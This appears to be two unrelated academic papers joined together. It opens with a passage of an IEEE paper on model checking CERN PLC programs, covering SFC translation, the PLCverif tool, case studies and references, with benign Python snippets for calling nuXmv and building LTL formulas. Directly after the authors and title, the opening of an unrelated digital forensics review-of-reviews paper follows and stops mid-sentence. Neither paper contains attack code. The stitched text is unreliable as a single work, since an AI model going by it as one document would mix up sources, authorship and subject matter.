Part 1 of Fig. 4 shows an example SFC program. (Note that it is a directed graph, but in Siemens notation the arrows are only shown if the direction is not top to bottom.) The steps are represented by gray boxes (S1, S2, etc.), and the transitions are represented by black rectangles. The transition T1 opens a simultaneous branch (denoted by a double line), thus after firing T1, both S2 and S3 will be active. On the contrary, S3 is followed by an alternative branch: either T2 or T3 can fire. If T2 fires, S4 will be active; if T3 fires, S5 will be active. T6 will only fire if both S2 and S6 are active. Each transition can only fire if its condition is evaluated to true. The conditions are not shown in the figure, but for each Ti the corresponding condition (guard) is the Boolean variable Ci.

The corresponding IM model is shown in Part 2 of Fig. 4. For each step Si, the corresponding F_V(Si) variable is denoted by si.x, and the corresponding F'_V(Si) variable is denoted by si.x'. The reason for using both x and x' is to avoid transition chaining, i.e., when the firing of a transition enables another transition that fires too. For example, firing T6 can enable T7 (provided that C7 is true), but according to the semantics of Siemens SFCs, this firing can only be performed when the SFC is called the next time. The parallel activation of S2 and S3 can be observed in the variable updates of the l1 → l2 IM transition. The alternative activation of S4 and S5 is visible in the l2 → l3 IM transitions. The set W defined for the transformation (cf. Rule SFC 3) is given in the following example: W = {({S1},{T1}), ({S2,S6},{T6}), ({S3},{T2,T3}), ({S4},{T4}), ({S5},{T5}), ({S7},{T7})}. The first and the last transitions of the IM model contain the synchronizations with other automata. These synchronizations represent the FB call of the SFC block.

G. Implementation of the Methodology

The methods presented above are implemented in a proof-of-concept tool called PLCverif. The PLC input parser is implemented using Xtext (http://eclipse.org/Xtext/). The provided abstract syntax tree is the input of the transformation and reduction algorithms implemented in Java. The whole procedure is implemented in an Eclipse-based tool that allows the user to import the PLC code and define the requirement to be verified. It also performs the model transformations, the automated model reductions, and calls the model checker tools. The feedback provided to the user is a verification report containing the result of the verification and the eventual counterexample. The definition of the code and requirement to be verified is the only task of the user; all the rest is automated and hidden. PLCverif is not available yet, but our plan is to make it production-ready and downloadable from our website (http://cern.ch/plcverif/).
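The last step of such a pipeline, calling the model checker and reading back a verdict, can be illustrated with the following self-contained snippet. The tiny SMV model is only a stand-in for a generated PLC model, and the snippet assumes that a nuXmv binary is available on the PATH and that a plain batch invocation on the file checks the specifications it contains (the exact command-line behaviour may differ between versions).

```python
import subprocess
import tempfile
from pathlib import Path

# A tiny model standing in for a generated PLC model:
# one location variable, one Boolean output, and one LTL requirement.
SMV_MODEL = """
MODULE main
VAR
  loc : {l1, l2};
  out : boolean;
ASSIGN
  init(loc) := l1;
  next(loc) := case loc = l1 : l2; TRUE : l1; esac;
  init(out) := FALSE;
  next(out) := loc = l1;
LTLSPEC G (loc = l2 -> out)
"""

def run_nuxmv(model_text: str) -> str:
    path = Path(tempfile.mkstemp(suffix=".smv")[1])
    path.write_text(model_text)
    # Assumption: `nuXmv <file>` in batch mode checks the specifications in the file
    # and prints "-- specification ... is true/false" plus a counterexample if any.
    proc = subprocess.run(["nuXmv", str(path)], capture_output=True, text=True)
    return proc.stdout

if __name__ == "__main__":
    report = run_nuxmv(SMV_MODEL)
    print("VIOLATED" if "is false" in report else "SATISFIED")
    print(report)
```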
V. EXPERIMENTAL RESULTS

This section provides experimental verification results on CERN PLC programs and real requirements. Most of the control systems used at CERN are developed using the Unified Industrial Control System (UNICOS) framework. This framework provides a common development process and a library of reusable base objects representing frequently used industrial control instrumentation (e.g., sensors and actuators). We present two typical formal verification use cases. In the first example, we check requirements on the model of a single base object from the UNICOS library, consisting mainly of a single FB with some function calls. The second example shows the verification of a requirement on a complete UNICOS application controlling a cryogenics subsystem. This application consists of hundreds of base object instances and a large application-specific logic.

A. Verification of a UNICOS Base Object

In this section, we present the verification of the UNICOS base object OnOff, which represents an actuator driven by digital signals (e.g., valve, heater, and motor). This object can run in different configurations with different parameters and in various modes; it can handle various errors. In the PLC code, the OnOff object is implemented by an FB written in SCL. This FB has 600 lines of code, 60 input variables, and 62 output variables. The data types used in this block are Booleans, integers, arrays, floats, and structures, e.g., an array composed of these data types. The FB has several function calls to three different functions.

The following is a real requirement expressed informally by the UNICOS developers: "if the object is controlled locally (is in the so-called hardware mode) and there is no interlock, nor explicit output change request valid in this mode, the output keeps its value".

To help developers to express real requirements and to facilitate the cooperation between developers and formal verification experts, we defined a set of easy-to-use requirement patterns (for details, see [33]). Using these patterns, a developer was able to formalize the requirement using variables and Boolean expressions as follows: "If OutOnOV=false & TStopI=false & FuStopI=false & StartI=false is true at the end of cycle N and HLD=true & HOnR=false & HOffR=false & TStopI=false & FuStopI=false & StartI=false is true at the end of cycle N+1, then OutOnOV=false is always true at the end of cycle N+1."

Requirements expressed using our patterns can be automatically formalized in LTL as G((EoC ∧ ¬OutOnOV ∧ ¬TStopI ∧ ¬FuStopI ∧ ¬StartI ∧ HLD ∧ X(¬EoC U (EoC ∧ HLD ∧ ¬HOnR ∧ ¬HOffR ∧ ¬TStopI ∧ ¬FuStopI ∧ ¬StartI))) → X(¬EoC U (EoC ∧ ¬OutOnOV))). In this formula, EoC is a Boolean symbol which evaluates to true at the end of each PLC cycle and only then.

TABLE I. Metrics of the models of OnOff.

Table I summarizes the performance metrics of the approach (the measurements were performed on a PC with an Intel Core i7-3770 3.4 GHz CPU and 8 GB RAM, running Windows 7 x64). Before the reductions, the size of the potential state space (PSS) is 1.6 × 10^218. After the general and requirement-dependent reductions, the PSS has 4.3 × 10^26 states, whereof 4.9 × 10^14 are reachable. Evaluation of the requirement takes 6.1 s using nuXmv without counterexample generation. This showed that the requirement is not satisfied. If the counterexample is generated too, the run time is 19.4 s. The generation of the model including all the reductions takes 0.6 s.

We used the counterexample generated by nuXmv to prove that the bug detected in our model is, indeed, a real bug. To this end, we analyzed the counterexample and automatically generated a PLC program exhibiting the bug on real hardware using the real code of the base object. This generated PLC code drives the module under verification to a state where the requirement is violated by feeding it with appropriate input values extracted from the counterexample. Thus, the discovered bug was not a result of our model generation technique, but was also confirmed in the real PLC code. This methodology has been found very useful for the controls engineers.

We have verified 52 different requirements provided by UNICOS developers for the OnOff object. Our experiments identified 11 cases where the requirement was not satisfied on this well-tested object used in numerous CERN applications. In four cases, the PLC program had to be modified. In seven cases, the problem was due to incomplete or bad specification.
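The pattern used above ("if expression α holds at the end of cycle N and expression β holds at the end of cycle N+1, then γ holds at the end of cycle N+1") can be instantiated mechanically. The sketch below shows one way to build such an LTL string from the three Boolean expressions; it is an illustrative reconstruction based on the formula shown above, not the actual pattern engine of [33].

```python
def cycle_pattern_to_ltl(alpha: str, beta: str, gamma: str) -> str:
    """LTL for: if `alpha` holds at the end of cycle N and `beta` at the end of
    cycle N+1, then `gamma` holds at the end of cycle N+1. `EoC` marks cycle ends."""
    next_eoc_with = lambda expr: f"X(!EoC U (EoC & {expr}))"  # next end-of-cycle satisfies expr
    return f"G((EoC & {alpha} & {next_eoc_with(beta)}) -> {next_eoc_with(gamma)})"

alpha = "!OutOnOV & !TStopI & !FuStopI & !StartI & HLD"
beta  = "HLD & !HOnR & !HOffR & !TStopI & !FuStopI & !StartI"
gamma = "!OutOnOV"
print(cycle_pattern_to_ltl(alpha, beta, gamma))
```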
B. Verification of a Full UNICOS PLC Application

We have chosen the so-called QSDN application (QSDN stands for Cryogenics Surface Liquid Nitrogen Storage System) as a second case study. This application controls one of the cryogenics subsystems of the Large Hadron Collider, illustrated in Fig. 5.

Fig. 5. QSDN process.

TABLE II. Metrics of the models of QSDN.

The size of QSDN is representative of medium-size UNICOS applications. It contains 110 functions and FBs, and consists of approximately 17,500 lines of code. Before reductions, this results in a huge generated model: the IM contains 302 automata, and the PSS size is 10^31985 (see M1 in Table II).

Verification of a full UNICOS application may rely on the specifications of the base objects of the UNICOS library, instead of their implementation. The correctness of these objects is addressed separately (cf. Section V-A). Thus, we speed up the verification process and focus the analysis on the potential integration errors without compromising its soundness. This is in contrast with testing, where a faulty base object could potentially hide integration errors.

Thus, the goal is to check the application-specific logic implemented in SCL and SFC. This logic is described in the UNICOS functional analysis document, which is a semi-formal textual specification. Application-specific functional requirements are also extracted from this specification.

Table II presents metrics relevant to the generated models. The original state space is huge and the original model obviously cannot be verified (see M1 in Table II). Based on the requirement to be verified, both the general and requirement-specific reductions can be used to reduce the model. Although these techniques have shown their efficiency and lead to a considerable state space reduction, the reduced model is still huge and impossible to verify.

The requirements extracted from the functional analysis are typically simple safety requirements, e.g., "if α is true, then β is true" (in CTL, AG(α → β)), where α and β denote Boolean expressions on variables. The example requirement to be checked is the following: If QSDN_4_DN1CT_SEQ_DB.Stop.x is true (at the end of a scan cycle), QSDN_4_1EH4001Ok.AuOffR should be true also.

Fig. 6. Excerpt of QSDN code relevant to the case study.

Fig. 6 shows the relevant part of the QSDN PLC code. Satisfaction of the requirement cannot be shown by inspection of this code part and requires additional information from the rest of the application. After the COI reduction, 3757 variables are kept in the reduced model (see model M2 in Table II). Formal verification is still not possible.

In this example, four iterations of the variable abstraction were needed to prove that the requirement is satisfied on the formal model. Using this technique, less than a minute was necessary to check this requirement (see M3 in Table II). As can be seen, our verification method can be used for isolated verification of modules or for verification of complete PLC applications. Approximately 30 different requirements were extracted from the QSDN functional analysis document, all of which were proven to be satisfied using the above method.
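The COI reduction used above can be approximated by a simple backward closure over the variable-dependency graph: starting from the variables of the requirement, keep every variable that can influence them and drop the rest. The sketch below is a simplified illustration of that idea (a real implementation works on the IM and has to handle arrays, structures and inter-automaton synchronizations); the data structures are hypothetical.

```python
def cone_of_influence(requirement_vars, influences):
    """`influences[v]` = set of variables whose values are read when v is assigned.
    Returns the set of variables that may influence the requirement."""
    keep, frontier = set(requirement_vars), list(requirement_vars)
    while frontier:
        v = frontier.pop()
        for w in influences.get(v, set()):
            if w not in keep:
                keep.add(w)
                frontier.append(w)
    return keep

# Toy example: b depends on a and x; x depends on y; z is unrelated.
influences = {"b": {"a", "x"}, "x": {"y"}, "z": {"q"}}
print(sorted(cone_of_influence({"b"}, influences)))  # ['a', 'b', 'x', 'y']
```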
VI. ANALYSIS AND DISCUSSION

The proposed methodology allows the generation and analysis of formal models for real-life systems. Using these techniques, we have identified bugs in real-life systems deployed at CERN.

Verification is made possible by the reduction techniques applied to the IM representation of such systems. Among the techniques discussed in this paper, COI, general rule-based reductions, and mode selection preserve the meaning of the model as relevant to a specific property: the property is satisfied in the reduced model if and only if it is satisfied in the original one.

The variable abstraction technique adds spurious system behaviors by introducing nondeterminism. If a safety property holds in the reduced model, it holds in the original one. However, spurious counterexamples may occur. If the property does not hold in the abstract model and a counterexample is produced, further analysis must be performed to determine whether it represents a real bug. Such analysis requires the expertise of a developer and knowledge of the application. If the counterexample represents a possible behavior of the system, a real bug is identified and the verification process terminates. If this analysis cannot prove that the counterexample is spurious, the model needs to be refined to reduce abstraction. In particular, application developers can refine a model by providing invariants, i.e., properties that are known to be satisfied in all reachable states of the model. For example, the statement "two steps of an SFC program cannot be both active at the end of the same PLC cycle" is an invariant satisfied by all SFC programs that do not contain parallel branches. The above process is applied iteratively until the requirement is shown to be satisfied or a bug is identified.

In the current state of the methodology, we cannot prove mathematically the correctness of all our model transformations. However, when a discrepancy between the specification and the formal model is detected, we can prove that this bug exists in the real PLC program. A small piece of code called a PLC demonstrator can be automatically generated out of the counterexample given by the model checker. This code reproduces the combination of input variable values that provoke the discrepancy, and the monitor will check whether the bug is reproduced also in the real PLC program.

A. Correctness of Our Approach

Apart from the combinatorial explosion of the state space, a fundamental limitation of all verification methodologies lies in the fact that requirements to be satisfied by the system are usually expressed informally. Moreover, they may be inconsistent [34] or fail to reflect the precise behavior expected by the designers [35]. To address this problem, we have defined a set of easy-to-use requirement patterns [33]. Our approach is similar to the one widely adopted in the industry, where simplified formal languages are used by developers to define requirements [36]–[38].

The second limitation comes from the correctness of the model-checking tools and of the result interpretation by the developers. Although several model checkers are used in a variety of projects, none of the well-established model checkers have been formally verified themselves. Furthermore, most practical verification methodologies involve abstraction, leading to the possibility of spurious counterexamples. As with compilation warnings, developers tend to dismiss counterexamples as spurious whenever they cannot be easily confirmed. Although the latter problem can be partially addressed by making counterexample analysis part of the automated process (e.g., [18]), the former is likely to persist. Thus, model checking cannot be the sole basis for system certification. However, we have shown that many bugs can be identified by formal verification which escape the usual testing procedures, considerably increasing the confidence one can put into industrial control applications.

A mathematically sound correctness proof requires the establishment of formal semantics for all involved languages. Using operational semantics for the model checker languages, our intermediate representation (cf. [3]) and the languages of the IEC 61131-3 standard (cf. [39] for IL and FBD), we can establish a simulation relation between the original and transformed models: states in the original model are related with semantically equivalent states in the transformed model. The simulation relation must preserve the properties to be verified (the choice of the employed abstractions influences the classes of properties that are preserved [27]). One such complete proof of the correctness of the abstraction rules that we used can be found in [5].
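The PLC demonstrator idea can be illustrated as follows: take the sequence of input valuations from the counterexample and emit a small SCL-like test harness that applies them cycle by cycle and flags a violation of the requirement. The sketch below generates such a harness as text; the emitted SCL is schematic (the block name, the monitored condition and the counterexample format are made up for this example) and is not the code generator used by the authors.

```python
def emit_demonstrator(counterexample, monitored_expr):
    """counterexample: list of dicts mapping input variable names to values,
    one dict per PLC cycle. Returns SCL-like source for a test harness FB."""
    lines = ["FUNCTION_BLOCK FB_Demonstrator",
             "VAR step : INT := 0; violation : BOOL := FALSE; END_VAR",
             "BEGIN",
             "  CASE step OF"]
    for i, cycle in enumerate(counterexample):
        assigns = " ".join(f"instOnOff.{k} := {v};" for k, v in cycle.items())
        lines.append(f"    {i}: {assigns}")
    lines += ["  END_CASE;",
              "  instOnOff();  // call the block under test with the forced inputs",
              f"  IF NOT ({monitored_expr}) THEN violation := TRUE; END_IF;",
              "  step := step + 1;",
              "END_FUNCTION_BLOCK"]
    return "\n".join(lines)

cex = [{"HLD": "TRUE", "HOnR": "FALSE"}, {"HLD": "TRUE", "HOffR": "FALSE"}]
print(emit_demonstrator(cex, "NOT instOnOff.OutOnOV"))
```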
VII. CONCLUSION AND FUTURE WORK

We have presented a general automated methodology for formal verification of PLC programs. The methodology is based on an IM, used as a pivot between all the PLC and formal modeling languages that we use. This approach potentially covers all PLC languages. The current implementation supports SCL and SFC; support for IL is under development. The IM model is automatically reduced, following which models for different verification tools are automatically generated. This allows us to benefit from the combined strengths of the different verification tools. The current implementation allows the generation of nuXmv, UPPAAL, and BIP models. We have presented the most relevant transformation rules from SCL and SFC to IM.

The reduction and abstraction techniques presented in this paper are applied to the IM. On one hand, this makes them independent from the source language, allowing verification of heterogeneous PLC applications. On the other hand, this approach decouples these techniques from the choice of the model checker, allowing greater flexibility and coherence of verification results. Finally, we have applied the presented methodology to real-life PLC control systems developed at CERN, demonstrating the feasibility of our approach. Formal verification using the presented methodology has allowed us to identify bugs in these systems, which have escaped the standard testing procedures.

There are two main directions for the future work on this project. First is the improvement of the specification methods for control systems. Such a language must be formal, unambiguous, and easy to understand. Second is the improvement of the abstraction techniques, with the goal of automating the variable abstraction.

REFERENCES
[1] Functional Safety of Electrical/Electronic/Programmable Electronic Safety-Related Systems, IEC Standard 61508, 2010.
[2] B. Fernández Adiego, E. Blanco Viñuela, J.-C. Tournier, V. M. González Suárez, and S. Bliudze, "Model-based automated testing of critical PLC programs," in Proc. 11th IEEE Int. Conf. Ind. Informat., 2013, pp. 722–727.
[3] B. Fernández Adiego, D. Darvas, J.-C. Tournier, E. Blanco Viñuela, J. O. Blech, and V. M. González Suárez, "Automated generation of formal models from ST control programs for verification purposes," CERN, Geneva, Switzerland, Internal Note CERN-ACC-NOTE-2014-0037, 2014. [Online]. Available: http://cds.cern.ch/record/1708853/files/Internal%20Note.pdf
[4] D. Darvas, B. Fernández Adiego, A. Vörös, T. Bartha, E. Blanco Viñuela, and V. M. González Suárez, "Formal verification of complex properties on PLC programs," in Formal Techniques for Distributed Objects, Components, and Systems. New York, NY, USA: Springer, 2014, pp. 284–299.
[5] B. Fernández Adiego, D. Darvas, E. Blanco Viñuela, J.-C. Tournier, V. M. González Suárez, and J. O. Blech, "Modelling and formal verification of timing aspects in large PLC programs," in Proc. 19th Int. Fed. Autom. Control World Congr., 2014, pp. 3333–3339.
[6] G. Frey and L. Litz, "Formal methods in PLC programming," in Proc. IEEE Int. Conf. Syst. Man Cybern., 2000, vol. 4, pp. 2431–2436.
[7] A. Mader and H. Wupper, "Timed automaton models for simple programmable logic controllers," in Proc. IEEE 11th Euromicro Conf. Real-Time Syst., 1999, pp. 106–113.
[8] A. Sülflow and R. Drechsler, "Verification of PLC programs using formal proof techniques," in Formal Methods for Automation and Safety in Railway and Automotive Systems. Budapest, Hungary: L'Harmattan, 2008, pp. 43–50.
[9] D. Soliman, K. Thramboulidis, and G. Frey, "Transformation of function block diagrams to UPPAAL timed automata for the verification of safety applications," Annu. Rev. Control, vol. 36, no. 2, pp. 338–345, 2012.
[10] M. Perin and J.-M. Faure, "Building meaningful timed models of closed-loop DES for verification purposes," Control Eng. Practice, vol. 21, no. 11, pp. 1620–1639, 2013.
[11] H. B. Mokadem, B. Bérard, V. Gourcuff, O. De Smet, and J.-M. Roussel, "Verification of a timed multitask system with UPPAAL," IEEE Trans. Autom. Sci. Eng., vol. 7, no. 4, pp. 921–932, Oct. 2010.
[12] C. A. Sarmento, J. R. Silva, P. E. Miyagi, and D. J. Santos Filho, "Modeling of programs and its verification for programmable logic controllers," in Proc. 17th Int. Fed. Autom. Control World Congr., 2008, pp. 10546–10551.
[13] O. Pavlović and H.-D. Ehrich, "Model checking PLC software written in function block diagram," in Proc. Int. Conf. Softw. Test. Verif. Valid., 2010, pp. 439–448.
[14] D. Soliman and G. Frey, "Verification and validation of safety applications based on PLCopen safety function blocks," Control Eng. Pract., vol. 19, no. 9, pp. 929–946, 2011.
[15] G. Canet, S. Couffin, J.-J. Lesage, A. Petit, and P. Schnoebelen, "Towards the automatic verification of PLC programs written in instruction list," in Proc. IEEE Int. Conf. Syst. Man Cybern., 2000, vol. 4, pp. 2449–2454.
[16] T. Bartha, A. Vörös, A. Jámbor, and D. Darvas, "Verification of an industrial safety function using coloured Petri nets and model checking," in Proc. 14th Int. Conf. Mod. Inf. Technol. Innov. Processes Ind. Entrep. (MITIP), 2012, pp. 472–485.
[17] N. Bauer et al., "Verification of PLC programs given as sequential function charts," in Integration of Software Specification Techniques for Applications in Engineering. New York, NY, USA: Springer, 2004, pp. 517–540.
[18] S. Biallas, J. Brauer, and S. Kowalewski, "Counterexample-guided abstraction refinement for PLCs," in Proc. 5th Int. Conf. Syst. Softw., 2010, pp. 10–18.
[19] J. Yoo, S. Cha, and E. Jee, "A verification framework for FBD based software in nuclear power plants," in Proc. 15th Asia-Pac. Softw. Eng. Conf., 2008, pp. 385–392.
[20] R. Glück and F. Krebs, "Towards interactive verification of programmable logic controllers using modal Kleene algebra and KIV," in Relational and Algebraic Methods in Computer Science. New York, NY, USA: Springer, 2015, pp. 241–256.
[21] J. Sadolewski, "Conversion of ST control programs to ANSI C for verification purposes," e-Informatica, vol. 5, no. 1, pp. 65–76, 2011.
[22] V. Gourcuff, O. de Smet, and J.-M. Faure, "Improving large-sized PLC programs verification using abstractions," in Proc. 17th Int. Fed. Autom. Control World Congr., 2008, pp. 5101–5106.
[23] T. Lange, M. R. Neuhäußer, and T. Noll, "Speeding up the safety verification of programmable logic controller code," in Hardware and Software: Verification and Testing. New York, NY, USA: Springer, 2013, pp. 44–60.
[24] J. Nellen, E. Ábrahám, and B. Wolters, "A CEGAR tool for the reachability analysis of PLC-controlled plants using hybrid automata," in Formalisms for Reuse and Systems Integration. New York, NY, USA, 2015, pp. 55–78.
[25] E. Kuzmin and V. Sokolov, "Modeling, specification and construction of PLC-programs," Autom. Control Comput. Sci., vol. 48, no. 7, pp. 554–563, 2014.
[26] T. Ovatman, A. Aral, D. Polat, and A. O. Ünver, "An overview of model checking practices on verification of PLC software," Softw. Syst. Model., 2014, doi: 10.1007/s10270-014-0448-7.
[27] M. Bozga, S. Graf, L. Mounier, and I. Ober, "Modeling and verification of real time systems using the IF toolbox," in Real Time Systems 1: Modeling and Verification Techniques. Cachan, France: Hermes/Lavoisier, 2008, vol. 1, ch. 9.
[28] M. Bozga, S. Graf, L. Mounier, and I. Ober, "IF validation environment tutorial," in Model Checking Software. New York, NY, USA: Springer, 2004, pp. 306–307.
[29] Programmable Controllers, IEC Standard 61131, 2013.
[30] Siemens, SIMATIC Programming With STEP 7 Manual, 2010, A5E02789666-01. [Online]. Available: https://support.industry.siemens.com/cs/document/45531107/simatic-programming-with-step-7-v55
[31] Siemens, Standards Compliance According to IEC 61131-3, 2011. [Online]. Available: http://support.automation.siemens.com/WW/view/en/50204938
[32] R. Cavada et al., "The nuXmv symbolic model checker," in Computer Aided Verification. New York, NY, USA: Springer, 2014, pp. 334–342.
[33] B. Fernández Adiego, D. Darvas, J.-C. Tournier, E. Blanco Viñuela, and V. M. González Suárez, "Bringing automated model checking to PLC program development – A CERN case study," in Proc. 12th Int. Workshop Discr. Event Syst., 2014, pp. 394–399.
[34] R. Alur et al., "Formal specifications and analysis of the computer-assisted resuscitation algorithm (CARA) infusion pump control system," Int. J. Softw. Tools Technol. Transfer, vol. 5, no. 4, pp. 308–319, 2004.
[35] G. Klein et al., "seL4: Formal verification of an OS kernel," in Proc. ACM SIGOPS 22nd Symp. Oper. Syst. Principles, 2009, pp. 207–220.
[36] M. Dwyer, G. Avrunin, and J. Corbett, "Patterns in property specifications for finite-state verification," in Proc. 21st Int. Conf. Softw. Eng., 1999, pp. 411–420.
[37] I. Beer, S. Ben-David, C. Eisner, D. Fisman, A. Gringauze, and Y. Rodeh, "The temporal logic Sugar," in Computer Aided Verification. New York, NY, USA: Springer, 2001, pp. 363–367.
[38] R. Armoni et al., "The ForSpec temporal logic: A new temporal property-specification language," in Tools and Algorithms for the Construction and Analysis of Systems. New York, NY, USA: Springer, 2002, pp. 296–311.
[39] J. O. Blech and S. O. Biha, "Verification of PLC properties based on formal semantics in Coq," in Software Engineering and Formal Methods. New York, NY, USA: Springer, 2011, pp. 58–73.

Borja Fernández Adiego, photograph and biography not available at the time of publication.
Dániel Darvas, photograph and biography not available at the time of publication.
Enrique Blanco Viñuela, photograph and biography not available at the time of publication.
Jean-Charles Tournier (M'09), photograph and biography not available at the time of publication.
Simon Bliudze, photograph and biography not available at the time of publication.
Jan Olaf Blech (M'05), photograph and biography not available at the time of publication.
Víctor Manuel González Suárez, photograph and biography not available at the time of publication.
Applying Model Checking to Industrial-Sized PLC Programs
Borja Fernández Adiego, Dániel Darvas, Enrique Blanco Viñuela, Jean-Charles Tournier, Member, IEEE, Simon Bliudze, Jan Olaf Blech, Member, IEEE, and Víctor Manuel González Suárez
IEEE Transactions on Industrial Informatics, vol. 11, no. 6, pp. 1400–1410, December 2015.
Research_Trends_Challenges_and_Emerging_Topics_in_Digital_Forensics_A_Review_of_Reviews.pdf
Due to its critical role in cybersecurity, digital forensics has received significant attention from researchers and practitioners alike. The ever-increasing sophistication of modern cyberattacks is directly related to the complexity of evidence acquisition, which often requires the use of several technologies. To date, researchers have presented many surveys and reviews on the field. However, such articles focused on the advances of each particular domain of digital forensics individually. Therefore, while each of these surveys facilitates researchers and practitioners in keeping up with the latest advances in a particular domain of digital forensics, the global perspective is missing. Aiming to fill this gap, we performed a qualitative review of all the relevant reviews in the field of digital forensics, determined the main digital forensics topics and identified their main challenges. Despite the diversity of topics and methods, there are several common problems that are faced by almost all of them, with most of them residing in evidence acquisition and pre-processing due to counter-analysis methods and difficulties in collecting data from devices, the cloud, etc. Beyond purely technical issues, our study highlights procedural issues in terms of readiness, reporting and presentation, as well as ethics, highlighting the European perspective, which is traditionally stricter in terms of privacy. Our extensive analysis paves the way for closer collaboration among researchers and practitioners across different topics of digital forensics.
Received January 22, 2022; accepted February 16, 2022; date of publication February 24, 2022; date of current version March 10, 2022.
Digital Object Identifier 10.1109/ACCESS.2022.3154059

Research Trends, Challenges, and Emerging Topics in Digital Forensics: A Review of Reviews

FRAN CASINO 1,2 (Member, IEEE), THOMAS K. DASAKLIS 3, GEORGIOS P. SPATHOULAS 4, MARIOS ANAGNOSTOPOULOS 5, AMRITA GHOSAL 6, ISTVÁN BÖRÖCZ 7, AGUSTI SOLANAS 1 (Senior Member, IEEE), MAURO CONTI 8,9 (Fellow, IEEE), AND CONSTANTINOS PATSAKIS 2,10
1 Department of Computer Engineering and Mathematics, Universitat Rovira i Virgili, 43007 Tarragona, Spain
2 Information Management Systems Institute, Athena Research Center, 151 25 Marousi, Greece
3 Hellenic Open University, 570 01 Patras, Greece
4 Norwegian University of Science and Technology (NTNU), 2802 Gjøvik, Norway
5 Aalborg University, 9220 Copenhagen, Denmark
6 CONFIRM Centre, University of Limerick, Limerick, V94 T9PX, Ireland
7 Vrije Universiteit Brussel, 1050 Brussels, Belgium
8 Department of Mathematics, University of Padua, 35122 Padua, Italy
9 Faculty of Electrical Engineering, Mathematics and Computer Science, Delft University of Technology, 2628 CD Delft, The Netherlands
10 Department of Informatics, University of Piraeus, 185 34 Piraeus, Greece
Corresponding author: Constantinos Patsakis ([email protected])
This work was supported in part by the European Commission under the Horizon 2020 Programme (H2020), as part of the projects LOCARD under Grant 832735, HEROES under Grant 101021801, and CyberSec4Europe under Grant 830929; and in part by the European Commission (call ISFP-2020-AG-TERFIN) as part of the CTC Project under Grant 830929. The work of Fran Casino was supported by the Beatriu de Pinós programme of the Government of Catalonia under Grant 2020 BP 00035. The associate editor coordinating the review of this manuscript and approving it for publication was Ilsun You.

INDEX TERMS Digital forensics, cybersecurity, review of reviews, forensic investigations, meta review.

I. INTRODUCTION
According to Edmond Locard's exchange principle, in every crime the perpetrator will alter the crime scene by bringing something and leaving something else [1], [2]. Therefore, these changes can be used as forensic evidence. While this principle is relatively straightforward, it is difficult in many cases to apply. This is why Locard introduced forensics labs in Law Enforcement Agencies (LEAs) over the first decade of the 20th century [3].

While procedures that resemble digital forensics are mentioned in computer science literature quite early, the domain was not fully defined until the 1980s, when it started to gain attention. The introduction of the IBM PC generalised the use of computing machines; thus, more interest was focused on digital evidence and many people came together and created a digital forensics community, which eventually became more formal in 1993 when the FBI hosted the First International Conference on Computer Evidence [4]. Initially, the main activity was examining standalone computers to recover deleted or destroyed files from the disks. However, since the early 2000s, the digital forensics domain has expanded steadily, maturing along with regulations [5], [6].
Nowadays, users tend to utilise multiple digital devices and access tens of digital services per day [7], [8]. The digital footprint of our everyday life has become enormous, and accordingly the probability that illegal activities leave digital evidence behind is very high. The need for forensic investigators has increased, and this has led to multiple academic education and certification programs related to digital forensics [9]. Additionally, the complexity of the tasks to be carried out and the required compliance with law and courts' regulations have led to the establishment of strict protocols and procedures to be followed [10]–[12]. The continuous appearance of new forms of cybercrime also requires adaptive investigation process models, new technology, and advanced techniques to deal with such incidents [13]–[15].

Beyond the rise of cybercrime, where the evidence is expected to be digital, digital evidence is underpinning almost all modern crime scenes. For instance, mobile devices have become a primary source of digital evidence, as almost all our communications are performed through them [6]. In fact, according to the EU (https://ec.europa.eu/commission/presscorner/detail/en/MEMO_18_3345), the bulk of criminal investigations (85%) involve electronic evidence. Thus, emails, cloud service providers, online payments, and wearable devices are often used to extract digital evidence in various circumstances.

A. MOTIVATION
Digital evidence has become a norm and underpins most modern crime investigations. However, there are different types of digital evidence to which different methods and methodologies apply. Some principles may remain the same; however, they cannot be applied to all types of evidence. For instance, collecting evidence from the Cloud bears no resemblance to IoT forensics or image forensics. This has led to a huge amount of research, which addresses the challenges raised in each domain individually, with the bulk of the work devoted to the development of novel tools and algorithms to extract digital evidence and intelligence from heterogeneous sources.

Currently, investigators devote many efforts to providing a systematic overview of the literature and the advances in each domain, with focused surveys and reviews. Despite the importance of these surveys, an analysis considering the challenges and issues of the different digital forensics domains as a whole is still missing. In other words, each of these surveys is focused on a specific domain and, as a result, common issues, challenges and methods are not identified. Moreover, research directions and approaches that could be applied in several domains remain explored in a topic-wise manner, lacking interoperability and denoting a lack of collaboration between researchers in different forensics domains. We sustain that the above is a serious gap in current literature, and we aim to fill it in this article. To this end, we present a review of reviews in the field of digital forensics.

B. CONTRIBUTION
Following a thorough methodological research process, we collect all relevant surveys and reviews in the field of digital forensics, analyse them, and answer a set of research questions, listed in Table 1, by performing the following actions:
- Analysing the current state of the art and practice, and identifying the challenges of each domain individually.
- Assessing whether the current state of the art is aligned with the technological evolution in digital forensics.
- Using the previously collected information to identify common issues, gaps, best strategies and key focus areas in digital forensics, trying to span across different domains.
- Assessing technological advances to highlight emerging challenges in digital forensics.

In addition to suggesting promising research lines in the field based on the above analysis, we cover other dimensions of digital forensics, including frameworks and process models, standardisation, readability and reporting, as well as legal and ethical aspects. To the best of our knowledge, this is the first review of reviews covering the state of the art in digital forensics and showcasing the actual state of practice from a global perspective.

The remainder of the article is organized as follows: Section II details our research methodology, providing a descriptive analysis of the retrieved literature, which is then complemented with a taxonomy of digital forensics in Section III. Section IV analyses the current state of practice regarding forensic methodologies and their phases, standards, and ethics. Relevant open issues, trends, and further research lines are discussed in Section V. The article concludes in Section VI with some final remarks.

TABLE 1. Summary of research questions and the corresponding sections devoted to answering them.

II. RESEARCH METHODOLOGY
In recent years, academic publishing has significantly increased both in terms of volume and speed. At the same time, new channels for publication, such as conference proceedings, open archives and numerous scientific journals, are rapidly expanding, thus allowing today's researchers to publish their work in a multitude of venues [16]. According to recent studies, approximately 22 new systematic reviews are published daily [17]. New methodological approaches for synthesising this evidence have been developed to keep up with the proliferation of systematic reviews across disciplines. Besides, conducting reviews of existing systematic reviews has become a logical next step in providing evidence in domains where a growing number of systematic reviews is available. Overviews or umbrella reviews are most commonly used to bring together, appraise, and synthesise the results of related systematic reviews when multiple systematic reviews on similar or related topics already exist [17], [18]. Therefore, a review of reviews or an umbrella review compiles evidence from multiple reviews or survey papers into a single document. Syntheses of previous systematic reviews are known by a variety of names, one of which is an umbrella review. Other descriptions include the terms "review of reviews," "systematic review of reviews," "review of systematic reviews," "overviews of reviews," "summary of systematic reviews," "summary of reviews," 